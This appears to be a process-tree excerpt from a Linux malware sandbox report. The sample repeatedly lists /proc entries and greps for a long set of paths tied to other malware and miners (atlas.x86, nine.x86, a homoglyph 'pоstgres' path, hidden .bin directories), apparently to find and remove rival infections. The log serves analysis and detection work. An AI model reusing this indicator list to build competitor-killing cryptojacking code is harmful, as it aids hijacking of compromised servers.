/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1245
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1244
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1247
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1249
-
-
/bin/grepgrep exe2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1254
-
-
/bin/grepgrep exe2⤵PID:1257
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1256
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1266
-
-
/bin/grepgrep exe2⤵PID:1270
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1269
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1273
-
-
/bin/grepgrep exe2⤵PID:1276
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1279
-
-
/bin/grepgrep exe2⤵PID:1283
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1285
-
-
/bin/grepgrep exe2⤵PID:1289
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1288
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1292
-
-
/bin/grepgrep exe2⤵PID:1295
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1294
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1298
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1301
-
-
/bin/grepgrep exe2⤵PID:1302
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1304
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1311
-
-
/bin/grepgrep exe2⤵PID:1314
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1313
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1318
-
-
/bin/grepgrep exe2⤵PID:1321
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1320
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1324
-
-
/bin/grepgrep exe2⤵PID:1328
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1327
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1330
-
-
/bin/grepgrep exe2⤵PID:1334
-
-
/bin/lsls -latrh /proc/net2⤵PID:1333
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1337
-
-
/bin/grepgrep exe2⤵PID:1340
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1339
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1343
-
-
/bin/grepgrep exe2⤵PID:1347
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1346
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1349
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1356
-
-
/bin/grepgrep exe2⤵PID:1359
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1358
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1362
-
-
/bin/grepgrep exe2⤵PID:1366
-
-
/bin/lsls -latrh /proc/self2⤵PID:1365
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1368
-
-
/bin/grepgrep exe2⤵PID:1372
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1371
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1381
-
-
/bin/grepgrep exe2⤵PID:1385
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1384
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1387
-
-
/bin/grepgrep exe2⤵PID:1390
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1389
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1392
-
-
/bin/grepgrep exe2⤵PID:1395
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1394
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1397
-
-
/bin/grepgrep exe2⤵PID:1400
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1399
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1402
-
-
/bin/grepgrep exe2⤵PID:1405
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1404
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1407
-
-
/bin/grepgrep exe2⤵PID:1410
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1409
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1412
-
-
/bin/grepgrep exe2⤵PID:1415
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1414
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1417
-
-
/bin/grepgrep exe2⤵PID:1420
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1419
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1422
-
-
/bin/grepgrep exe2⤵PID:1425
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1424
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1427
-
-
/bin/grepgrep exe2⤵PID:1430
-
-
/bin/lsls -latrh /proc/version2⤵PID:1429
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1432
-
-
/bin/grepgrep exe2⤵PID:1435
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1434
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1437
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1439
-
-
/bin/grepgrep exe2⤵PID:1440
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1442
-
-
/bin/grepgrep exe2⤵PID:1445
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1444
-
-
